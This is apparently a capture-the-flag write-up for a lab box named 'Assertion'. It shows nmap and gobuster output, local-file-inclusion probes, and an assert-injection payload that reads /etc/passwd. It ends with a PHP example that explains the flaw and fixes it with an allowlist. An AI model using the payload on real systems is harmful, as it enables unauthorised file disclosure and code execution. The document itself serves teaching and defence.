PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:ce:aa:cc:02:de:a5:a3:58:5d:da:2b:ef:54:07:f9 (RSA)
| 256 9d:3f:df:16:7a:e1:59:58:84:4a:e3:29:8f:44:87:8d (ECDSA)
|_ 256 87:b5:6f:f8:21:81:d3:3b:43:d0:40:81:c0:e3:69:89 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Assertion
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.81.94 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.hta (Status: 403) [Size: 278]
/css (Status: 301) [Size: 312] [--> http://192.168.81.94/css/]
/fonts (Status: 301) [Size: 314] [--> http://192.168.81.94/fonts/]
/img (Status: 301) [Size: 312] [--> http://192.168.81.94/img/]
/index.php (Status: 200) [Size: 36592]
/js (Status: 301) [Size: 311] [--> http://192.168.81.94/js/]
/pages (Status: 301) [Size: 314] [--> http://192.168.81.94/pages/]
/server-status (Status: 403) [Size: 278]
Tried LFI, but it is not as easy as on the EASY boxes.
Finally came to this Stack Overflow post and HackTricks, the saviors of my life.
This is assert LFI, and it does the file path traversal.
To start the test, we have this website to test:
<http://192.168.81.94/index.php?page=gallery>
First, to get some idea of the directory traversal:
<http://192.168.81.94/index.php?page=.>
This should throw an exception, which determines whether to continue with the LFI.
Then we continue by adding a null byte:
<http://192.168.81.94/index.php?page=.%00>
And this throws another exception.
And finally came to this Stack Overflow question: <https://security.stackexchange.com/questions/146757/cannot-figure-out-how-to-bypass-this-function-for-lfi>
Turns out this is called Assert LFI, and HackTricks has some tricks on this:
' and die(show_source('/etc/passwd')) or '
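Why the quote in that payload matters, and how the include should have been written, as an added example that is not code from the target box: `build_assertion()` is an assumed reconstruction of the string-`assert()` pattern this class of bug relies on, and `ALLOWED_PAGES` and `resolve_page()` are hypothetical names (only `gallery` appears on the page).

```php
<?php
// Assumed vulnerable pattern (PHP < 8): the page parameter is pasted into a
// string that assert() would evaluate as PHP code. This function only BUILDS
// that string so the injection is visible; nothing is evaluated here.
function build_assertion(string $page): string {
    $file = "pages/" . $page . ".php";
    return "strpos('$file', '..') === false";
}

// Hardened form: the parameter selects from a fixed allowlist. No user data
// reaches a code string or a filesystem path unless it matched exactly.
const ALLOWED_PAGES = ['home', 'gallery', 'contact']; // hypothetical page names

function resolve_page(string $page): ?string {
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null; // caller should answer 404 and log the request
    }
    return __DIR__ . "/pages/" . $page . ".php";
}

// Inputs taken from the requests shown on this page.
$samples = [
    "gallery",
    ".",
    "' and die(show_source('/etc/passwd')) or '",
];

foreach ($samples as $p) {
    echo "input:    ", $p, PHP_EOL;
    // With the third sample the single quote closes the string literal, so
    // the rest of the parameter becomes code inside the assertion.
    echo "asserted: ", build_assertion($p), PHP_EOL;
    echo "hardened: ", resolve_page($p) ?? "(rejected)", PHP_EOL, PHP_EOL;
}
```

String arguments to `assert()` were deprecated in PHP 7.2 and are no longer evaluated as code from PHP 8.0, so the allowlist is the fix that holds on every version.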